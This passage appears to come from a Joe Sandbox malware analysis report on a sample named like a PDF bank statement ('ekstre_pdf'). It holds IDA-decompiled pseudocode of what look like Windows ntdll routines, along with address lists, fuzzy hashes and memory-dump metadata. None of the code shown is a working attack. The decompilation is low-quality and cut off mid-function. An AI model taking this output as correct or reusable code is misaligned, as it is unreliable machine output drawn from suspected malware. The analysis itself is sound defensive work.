										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x3c60564
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E3408F1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x3c5f770
									_t86 = _t255 + 0x10; // 0x3c60564
									 *0x341591e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x341591e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x341591e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = E34073C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x3c60564
										_t250 = E340EC490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E3408F1DB(_t250);
									_t228 = E3408F1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x3c60564
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}

0x3408ee48
0x3408ee4a
0x3408ee4f
0x3408ee54
0x3408ee56
0x3408ee5b
0x3408ee60
0x3408ee63
0x3408ee66
0x3408ee68
0x3408ee70
0x3408ee73
0x3408ee76
0x3408ee79
0x3408ee80
0x3408ee85
0x3408ee88
0x00000000
0x3408ee8b
0x3408ee93
0x3408ee98
0x3408ee9f
0x3408eeac
0x3408eeb8
0x3408eeb8
0x3408eebe
0x3408eec6
0x3408eec9
0x3408eec9
0x3408eece
0x3408eece
0x3408eece
0x3408eece
0x3408eece
0x3408eece
0x3408eed3
0x3408eed6
0x3408eedb
0x3408eee0
0x3408eee6
0x3408eeee
0x3408eeee
0x3408eef0
0x3408eef4
0x3408eef6
0x00000000
0x00000000
0x3408f1dc
0x3408f1dc
0x3408eefc
0x3408eefc
0x3408ef01
0x3408ef03
0x3408ef06
0x3408ef09
0x3408ef0c
0x3408ef0f
0x3408ef0f
0x3408ef16
0x3408ef16
0x3408ef1b
0x3408ef20
0x3408ef26
0x3408ef29
0x3408ef2c
0x3408ef2c
0x3408ef36
0x3408ef36
0x3408ef3b
0x3408ef40
0x3408ef46
0x3408ef4c
0x3408ef54
0x3408ef57
0x3408ef59
0x3408ef60
0x3408ef63
0x3408ef63
0x3408ef66
0x3408ef69
0x3408ef6c
0x3408f113
0x3408f113
0x3408f115
0x3408f122
0x3408f127
0x3408f12b
0x340cfe64
0x340cfe6a
0x340cfe6a
0x00000000
0x3408f12b
0x3408ef72
0x3408ef74
0x00000000
0x00000000
0x3408ef7a
0x3408ef7d
0x3408ef7d
0x3408ef7d
0x3408ef81
0x3408f144
0x3408f144
0x3408f14a
0x340cfd20
0x340cfd23
0x3408ef90
0x3408ef90
0x3408ef93
0x340cfd2e
0x340cfd31
0x00000000
0x00000000
0x340cfd37
0x340cfd45
0x340cfd4b
0x340cfd4b
0x340cfd4e
0x00000000
0x00000000
0x00000000
0x340cfd54
0x340cfd3c
0x340cfd3f
0x00000000
0x00000000
0x00000000
0x340cfd3f
0x3408ef99
0x3408ef99
0x3408ef9c
0x3408f1a6
0x3408f1a9
0x00000000
0x00000000
0x00000000
0x3408f1af
0x3408efa2
0x3408efa2
0x3408efa5
0x3408efab
0x3408efae
0x3408efb4
0x3408efba
0x3408efc0
0x3408efc6
0x3408efcc
0x3408efd8
0x3408efde
0x3408efe1
0x3408efe7
0x3408efe9
0x3408efec
0x3408eff3
0x3408eff8
0x3408effa
0x3408efff
0x3408f002
0x3408f008
0x3408f00a
0x3408f15d
0x3408f164
0x3408f165
0x3408f168
0x3408f16b
0x3408f16e
0x3408f170
0x00000000
0x00000000
0x3408f176
0x3408f17a
0x3408f1c8
0x3408f1cf
0x3408f1d0
0x3408f1d3
0x00000000
0x3408f1d3
0x3408f17c
0x3408f105
0x3408f105
0x3408f108
0x3408f10a
0x3408f1b7
0x3408f1b7
0x3408f110
0x00000000
0x3408f110
0x3408f010
0x3408f010
0x3408f013
0x3408f0a2
0x3408f0a2
0x3408f0a6
0x3408f186
0x3408f186
0x3408f0ac
0x3408f0b0
0x340cfe56
0x340cfe56
0x3408f103
0x3408f103
0x00000000
0x3408f103
0x3408f0bc
0x3408f0c3
0x3408f0c4
0x3408f0c7
0x3408f0ce
0x340cfe35
0x340cfe35
0x340cfe39
0x00000000
0x00000000
0x340cfe41
0x340cfe41
0x340cfe42
0x340cfe48
0x340cfe51
0x00000000
0x340cfe51
0x3408f0d4
0x3408f0db
0x00000000
0x00000000
0x3408f0e1
0x3408f0e5
0x3408f193
0x3408f199
0x3408f19b
0x00000000
0x00000000
0x3408f0f4
0x3408f0f4
0x3408f0f8
0x3408f0fa
0x3408f0fd
0x340cfe1e
0x340cfe21
0x340cfe24
0x340cfe27
0x340cfe2a
0x340cfe2d
0x340cfe2d
0x3408f0fd
0x00000000
0x3408f0f8
0x3408f0eb
0x3408f0ee
0x3408f0f1
0x00000000
0x3408f0f1
0x3408f01c
0x3408f01f
0x3408f02a
0x3408f02d
0x3408f030
0x3408f034
0x3408f036
0x3408f039
0x3408f045
0x3408f051
0x3408f05a
0x3408f05a
0x3408f05d
0x3408f060
0x3408f062
0x340cfd59
0x340cfd5c
0x00000000
0x00000000
0x340cfd62
0x340cfd66
0x340cfd72
0x340cfd84
0x340cfd8a
0x340cfd8d
0x340cfd90
0x00000000
0x340cfd90
0x340cfd68
0x340cfd6c
0x00000000
0x00000000
0x00000000
0x3408f068
0x3408f068
0x3408f068
0x3408f06d
0x340cfd98
0x340cfda8
0x340cfdae
0x340cfdae
0x3408f073
0x3408f078
0x3408f07a
0x340cfdbf
0x3408f080
0x3408f080
0x3408f080
0x3408f085
0x3408f088
0x340cfde1
0x340cfde4
0x340cfde4
0x3408f08e
0x3408f095
0x3408f09d
0x00000000
0x3408f09d
0x3408f062
0x340cfd29
0x3408f150
0x3408f153
0x00000000
0x00000000
0x00000000
0x3408f155
0x3408ef87
0x3408ef8a
0x3408f136
0x3408f13c
0x3408f13e
0x00000000
0x00000000
0x00000000
0x3408f13e
0x00000000
0x3408ef8a

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23074ca211ed78e0e878a2d095bfb911f25f6b20ea932a3e672315e3d1da34ee
Instruction ID: bbc477e278cc2c8a570e266caeba019e5d338a4a9b31625383a0bafb5893a574
Opcode Fuzzy Hash: 23074ca211ed78e0e878a2d095bfb911f25f6b20ea932a3e672315e3d1da34ee
Instruction Fuzzy Hash: F7E1F274E00708CFDB25CFA9CA80A9DBBF5FF88314F2045AAE555AB265DB70A841CF51

Uniqueness

Uniqueness Score: -1.00%

Function 3413A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3413A0F7
RtlDebugPrintTimes.NTDLL ref: 3413A1AA
RtlDebugPrintTimes.NTDLL ref: 3413A1CE
RtlDebugPrintTimes.NTDLL ref: 3413A1E3

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 97656cc12f7dc502472373e859468a3c0c529f38952965e89a785c668988660f
Instruction ID: 97e47927f9984ecfc3df712c9e9dabaf566e3d66062df6f0afe700bb4bc67919
Opcode Fuzzy Hash: 97656cc12f7dc502472373e859468a3c0c529f38952965e89a785c668988660f
Instruction Fuzzy Hash: 8C516879712A12DFEB08CF19D8E0A19B7E5FB89390B1541ADD90ADB720DB71EC41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 340DEBC0 Relevance: 6.2, APIs: 4, Instructions: 158timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 340DEEED
RtlDebugPrintTimes.NTDLL ref: 340DEF12
RtlDebugPrintTimes.NTDLL ref: 340DEFA4
RtlDebugPrintTimes.NTDLL ref: 340DEFF8

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 48621cd7ce15fb2f8433de64ecdecd2e3d245b39836ffdd0523bc40fd478270d
Instruction ID: ef2be6bbd3b22fc7a4645b5179496aa4211048dc31297fd7f74e6533cb4d5a06
Opcode Fuzzy Hash: 48621cd7ce15fb2f8433de64ecdecd2e3d245b39836ffdd0523bc40fd478270d
Instruction Fuzzy Hash: 4C5123B2E007189FEB08CF95D844ADDBBF5FF49350F1480AAE905AB250DB359909CF94

Uniqueness

Uniqueness Score: -1.00%

Function 34097A4F Relevance: 6.1, APIs: 4, Instructions: 81
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E34097A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t34;
				signed int _t35;
				signed int _t40;
				intOrPtr _t42;
				void* _t50;
				intOrPtr* _t55;
				intOrPtr* _t69;
				void* _t73;

				_t63 = __edx;
				_t51 = __ebx;
				_push(0x30);
				_push(0x3413c840);
				E340B7BE4(__ebx, __edi, __esi);
				_t66 = __ecx;
				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
				_t69 =  *0x34155a7c;
				_push(__edx);
				if(_t69 == 0) {
					 *0x341591e0();
					E3409B490(__ecx, __edx,  *__ecx());
					_t55 =  *((intOrPtr*)(_t73 - 0x14));
					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
					_t34 =  *0x34155d38; // 0x6dd94cd8
					 *(_t73 - 0x30) = _t34;
					__eflags =  *0x341565fc; // 0x184d8fc3
					if(__eflags == 0) {
						_push(0);
						_push(4);
						_push(_t73 - 0x2c);
						_push(0x24);
						_push(0xffffffff);
						 *(_t73 - 0x1c) = E340A2B20();
						__eflags =  *(_t73 - 0x1c);
						if( *(_t73 - 0x1c) < 0) {
							E340B8AA0(_t55, _t63,  *(_t73 - 0x1c));
						}
						 *0x341565fc =  *(_t73 - 0x2c);
					}
					_t35 =  *0x341565fc; // 0x184d8fc3
					 *(_t73 - 0x20) = _t35;
					_push(0x20);
					asm("ror eax, cl");
					 *(_t73 - 0x34) =  *(_t73 - 0x30);
					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
					__eflags = _t40;
					 *(_t73 - 0x38) = _t40;
					if(__eflags == 0) {
						 *((intOrPtr*)(_t73 - 0x3c)) = E34118890(_t51, _t63, _t66, 0, __eflags,  *((intOrPtr*)(_t73 - 0x24)), 0x340350b4);
						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
					} else {
						 *0x341591e0( *((intOrPtr*)(_t73 - 0x24)));
						_t42 =  *( *(_t73 - 0x38))();
					}
					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
					return  *((intOrPtr*)(_t73 - 0x28));
				} else {
					 *0x341591e0();
					_t50 =  *_t69();
					 *(_t73 - 4) = 0xfffffffe;
					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
					return _t50;
				}
			}

0x34097a4f
0x34097a4f
0x34097a4f
0x34097a51
0x34097a56
0x34097a5b
0x34097a5d
0x34097a61
0x34097a67
0x34097a6a
0x340d47f8
0x340d4801
0x340d4806
0x340d480d
0x340d4810
0x340d4813
0x340d4818
0x340d481d
0x340d4823
0x340d4825
0x340d4826
0x340d482b
0x340d482c
0x340d482e
0x340d4835
0x340d4838
0x340d483b
0x340d4840
0x340d4840
0x340d4848
0x340d4848
0x340d484d
0x340d4852
0x340d485b
0x340d4863
0x340d4865
0x340d486b
0x340d486b
0x340d486e
0x340d4871
0x340d4892
0x340d4895
0x340d4873
0x340d487b
0x340d4881
0x340d4881
0x340d4898
0x340d489e
0x34097a70
0x34097a72
0x34097a7c
0x340d48ac
0x340d48b6
0x340d48c2
0x340d48c2

APIs

RtlDebugPrintTimes.NTDLL ref: 34097A72
BaseThreadInitThunk.KERNEL32 ref: 34097A7C
RtlDebugPrintTimes.NTDLL ref: 340D47F8
RtlDebugPrintTimes.NTDLL ref: 340D487B

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 2c239c8e5900a379e25aa15a8a1d33f3efebc729b29df3b2d00f83412b108996
Instruction ID: 34b6710d5415362ff1ff21061a7c488eec00ebc6ef5a59ff9235209f27cc466a
Opcode Fuzzy Hash: 2c239c8e5900a379e25aa15a8a1d33f3efebc729b29df3b2d00f83412b108996
Instruction Fuzzy Hash: 84312075E20628DFDB05DFA8D884ADEBBF5FB48360F1041AAE811B7290DB349901CF94

Uniqueness

Uniqueness Score: -1.00%

Function 340658E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E340658E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v96;
				intOrPtr _v144;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed char _v176;
				intOrPtr _v180;
				char _v216;
				intOrPtr _v220;
				signed int _v228;
				intOrPtr* _v240;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				signed int _v260;
				char _v261;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v288;
				signed int _v292;
				char _v300;
				void* _v304;
				signed int _v308;
				char _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v352;
				signed int* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v380;
				intOrPtr _v388;
				signed int _v392;
				intOrPtr _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _t235;
				signed int _t236;
				intOrPtr* _t242;
				intOrPtr _t250;
				char _t253;
				char _t254;
				intOrPtr _t257;
				signed int _t261;
				intOrPtr _t262;
				char _t268;
				void* _t273;
				signed int* _t282;
				intOrPtr _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				char _t298;
				intOrPtr _t309;
				signed int _t316;
				char _t317;
				signed int _t322;
				signed int _t323;
				char _t332;
				intOrPtr _t339;
				intOrPtr _t340;
				intOrPtr* _t342;
				signed int _t343;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				intOrPtr* _t368;
				char* _t375;
				signed int _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int _t387;
				intOrPtr _t388;
				void* _t389;
				void* _t390;

				_t390 = __eflags;
				_t379 = __esi;
				_t341 = __ebx;
				_push(0xfffffffe);
				_push(0x3413bd28);
				_push(E340AAD20);
				_push( *[fs:0x0]);
				_t388 = _t387 - 0x184;
				_t235 =  *0x3415b370;
				_v12 = _v12 ^ _t235;
				_t236 = _t235 ^ _t387;
				_v32 = _t236;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t236);
				 *[fs:0x0] =  &_v20;
				_v28 = _t388;
				_t377 = _a4;
				_v312 = 0;
				_v260 = _t377;
				_v250 = 0;
				_v251 = 0;
				_v247 = 0;
				_v246 = 0;
				_v252 = 0;
				_v245 = 0;
				_v248 = 0;
				_v253 = 0;
				_v304 = 0;
				_v268 = 0;
				E34068120();
				_v292 =  *[fs:0x30];
				_v8 = 0;
				E340680BE(__ebx,  &_v312, _t377, __esi, _t390);
				_t347 =  &_v304;
				E34068009( &_v304);
				_t242 = _v304;
				if(_t242 != 0) {
					_t347 =  &_v244;
					 *_t242 =  &_v244;
				}
				E340A8F40( &_v244, 0, 0xd4);
				_t389 = _t388 + 0xc;
				_v8 = 1;
				_v8 = 2;
				L340653C0(_t377 + 0xe0);
				_v8 = 3;
				if( *((char*)(_t377 + 0xe5)) != 0) {
					_v276 = 0xc000010a;
					L73:
					_v246 = 1;
					_v247 = 1;
					L5:
					_v8 = 2;
					E34066055(_t377);
					_t394 = _v247;
					if(_v247 != 0) {
						L67:
						_v8 = 1;
						E34066074(_t341, _t347, _t377, _t379);
						_v8 = 0;
						E34066179(_t379);
						_t379 = 0;
						__eflags = 0;
						_v276 = 0;
						_v8 = 0xfffffffe;
						_t250 = E3409B490(_t347, _t371, 0);
						L68:
						_v300 = 0;
						L12:
						if((_v84 & 0x00000001) != 0) {
							E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
							_v84 = _v84 & 0xfffffffe;
							_t250 = _v276;
						}
						if(_t250 != 0) {
							_t253 = _t250 - 0x80;
							__eflags = _t253;
							if(_t253 == 0) {
								goto L67;
							}
							_t254 = _t253 - 0x40;
							__eflags = _t254;
							if(_t254 == 0) {
								_v8 = 6;
								_t347 = 0;
								E340663CB(0);
								_v8 = 2;
								goto L8;
							}
							__eflags = _t254 != 0x42;
							if(_t254 != 0x42) {
								goto L8;
							}
							_v253 = 1;
							goto L67;
						} else {
							if(_t377 != 0) {
								_t268 =  *((intOrPtr*)(_t377 + 0x110));
								__eflags = _t268;
								if(_t268 != 0) {
									L16:
									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
										_t379 = _t377 + 0x2c;
										L34072330(_t268, _t377 + 0x2c);
										E34134407(_t377);
										E340724D0(_t377 + 0x2c);
									}
									_t371 = _v288;
									_t347 =  &_v244;
									_t273 = E340664F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
									if(_t273 != 0) {
										goto L67;
									} else {
										if(_v245 != _t273) {
											L8:
											_v268 = 0;
											_v64 = 0;
											_v60 = 0;
											_v56 = 0;
											_v52 = 0;
											_t341 = _v48;
											_v280 = 0x10;
											if(_t341 == 0) {
												_t257 =  *0x34156644; // 0x0
												_v392 = _t257 + 0x300000;
												_t261 = E34075D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
												__eflags = _t261;
												if(_t261 == 0) {
													L75:
													_v280 = 1;
													_t261 =  &_v64;
													L11:
													_v288 = _t261;
													_v300 = 0;
													_v8 = 5;
													_t262 =  *((intOrPtr*)(_t377 + 0x24));
													_v396 = _t262;
													_push( &_v96);
													_t347 =  &_v300;
													_push( &_v300);
													_push(_v280);
													_push(_v288);
													_push(_t262);
													_t250 = E340A46E0();
													_v276 = _t250;
													_v8 = 2;
													if(_t250 != 0) {
														goto L68;
													}
													goto L12;
												}
												_t181 = _t261 + 0x1c0; // 0x1c0
												_t366 = _t181;
												 *_t366 = _t261;
												 *((intOrPtr*)(_t366 + 4)) = 1;
												 *((intOrPtr*)(_t366 + 8)) = 0x10;
												_v48 = _t366;
												_v280 = 0x10;
												goto L11;
											}
											if( *((intOrPtr*)(_t341 + 4)) != 1) {
												goto L75;
											}
											_t379 = _v48;
											E340A8F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
											_t389 = _t389 + 0xc;
											_v280 =  *(_t379 + 8);
											_t261 =  *_t341;
											goto L11;
										}
										_t379 = _v64;
										if(_t379 != 0) {
											_v400 = _t379;
											_v168 =  *((intOrPtr*)(_t379 + 0x20));
											_v164 = _t379;
											_t372 =  &_v244;
											E34066D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
											E34066D60( &_v216);
											_v8 = 7;
											_t342 =  *((intOrPtr*)(_t379 + 0x20));
											_push( &_v56);
											_push(_v60);
											_push(_t379);
											_push( &_v216);
											__eflags = _t342 - E34066E00;
											if(_t342 == E34066E00) {
												E34066E00( &_v216);
												L33:
												_v8 = 2;
												L34:
												if((_v176 & 0x00000004) != 0) {
													_v248 = 1;
												}
												_v261 = _v180 == 4;
												_v8 = 9;
												E340661C3( &_v216, _t372);
												_v8 = 2;
												_v228 = 0;
												if(_v248 != 0) {
													_t282 = _t377 + 8;
													_v308 = _t282;
													_t343 =  *_t282;
													_t356 = _t282[1];
													_v328 = _t343;
													_v324 = _t356;
													goto L86;
													do {
														do {
															L86:
															_t380 = _t343;
															_v272 = _t380;
															_t371 = _t356;
															_v380 = _t371;
															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
															_t379 = _v308;
															asm("lock cmpxchg8b [esi]");
															_t343 = _t380;
															_v328 = _t343;
															_t356 = _t371;
															_v324 = _t356;
															__eflags = _t343 - _v272;
														} while (_t343 != _v272);
														__eflags = _t356 - _v380;
													} while (_t356 != _v380);
													_v352 = 3;
													_push(4);
													_push( &_v352);
													_push(9);
													_push( *((intOrPtr*)(_t377 + 0x24)));
													E340A43A0();
												} else {
													_t288 =  *((intOrPtr*)(_t377 + 0x110));
													if(_t288 == 0) {
														_t288 =  *0x7ffe03c0;
													}
													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
														L34072330(_t288, _t377 + 0x2c);
														E34134407(_t377);
														E340724D0(_t377 + 0x2c);
													}
													_t292 = _t377 + 8;
													_v356 = _t292;
													_t379 =  *_t292;
													_t347 = _t292[1];
													_v320 = _t379;
													_v316 = _t347;
													while(1) {
														_t341 = _t379;
														_v360 = _t341;
														_t371 = _t347;
														_v364 = _t371;
														_t293 = _t341 & 0x0000ffff;
														_v308 = _t293;
														if( *((char*)(_t377 + 0xe4)) != 0) {
															goto L67;
														}
														if(_t371 != 0) {
															__eflags = _t293;
															if(_t293 < 0) {
																__eflags = _v261;
																if(_v261 == 0) {
																	goto L41;
																}
															}
															_v249 = 0;
															_v316 = _t371 - 1;
															L42:
															_t297 = _t341;
															_t341 = _t379;
															asm("lock cmpxchg8b [esi]");
															_t379 = _t297;
															_v320 = _t379;
															_t347 = _t371;
															_v316 = _t347;
															if(_t379 != _v360 || _t347 != _v364) {
																continue;
															} else {
																_t298 = _v249;
																_v245 = _t298;
																if(_t298 != 0) {
																	goto L8;
																}
																goto L20;
															}
														}
														L41:
														_v249 = 1;
														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
														_v320 = _t379;
														goto L42;
													}
												}
												goto L67;
											}
											__eflags = _t342 - E34067290;
											if(_t342 != E34067290) {
												__eflags = _t342 - E34065570;
												if(_t342 != E34065570) {
													 *0x341591e0();
													 *_t342();
													_v8 = 2;
													goto L34;
												}
												E34065570( &_v216);
												goto L33;
											}
											E34067290();
											goto L33;
										}
										L20:
										_push( &_v272);
										_t371 =  &_v244;
										_t347 = _t377;
										if(E34066970(_t377,  &_v244) == 0) {
											goto L67;
										}
										if((_v84 & 0x00000001) != 0) {
											E3405BE18( &_v216);
											_v84 = _v84 & 0xfffffffe;
										}
										_t359 = _v272;
										_v228 = _t359;
										_v168 =  *((intOrPtr*)( *_t359));
										_v164 = _t359;
										_v144 = _v220;
										_t360 =  *[fs:0x18];
										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
										_t309 = _v220;
										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
											_t372 = _v160 | 0x00000008;
											_v160 = _t372;
											_t316 =  *[fs:0x18];
											_v408 = _t316;
											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
												_t317 = 1;
											} else {
												_t317 = 0;
											}
											if(_t317 != 0) {
												_t372 = _t372 | 0x00000004;
												_v160 = _t372;
											}
											if(E34066929() != 0) {
												_v160 = _t372;
											}
											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
												_v160 = _v160 | 0x00000020;
											}
											_t322 =  *[fs:0x18];
											_v404 = _t322;
											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
												_v160 = _v160 | 0x00000040;
											}
											_t323 =  *[fs:0x18];
											_v380 = _t323;
											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
												_v160 = _v160 | 0x00000080;
											}
										}
										_v8 = 8;
										_t361 = _v272;
										_t384 =  *((intOrPtr*)( *_t361));
										_push(_t361);
										_push( &_v216);
										if(_t384 != E34066B70) {
											__eflags = _t384 - E340656E0;
											if(_t384 != E340656E0) {
												 *0x341591e0();
												 *_t384();
											} else {
												E340656E0(_t361);
											}
										} else {
											E34066B70();
										}
										goto L33;
									}
								}
							}
							_t268 =  *0x7ffe03c0;
							goto L16;
						}
					}
					E34067F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
					_v252 = 1;
					_t379 = _v292;
					L34072330(_t379 + 0x250, _t379 + 0x250);
					_v8 = 4;
					_t332 = _t379 + 0x254;
					_t368 =  *((intOrPtr*)(_t332 + 4));
					if( *_t368 != _t332) {
						asm("int 0x29");
						__eflags = _v292 + 0x250;
						return E340724D0(_v292 + 0x250);
					}
					_v244 = _t332;
					_v240 = _t368;
					_t375 =  &_v244;
					 *_t368 = _t375;
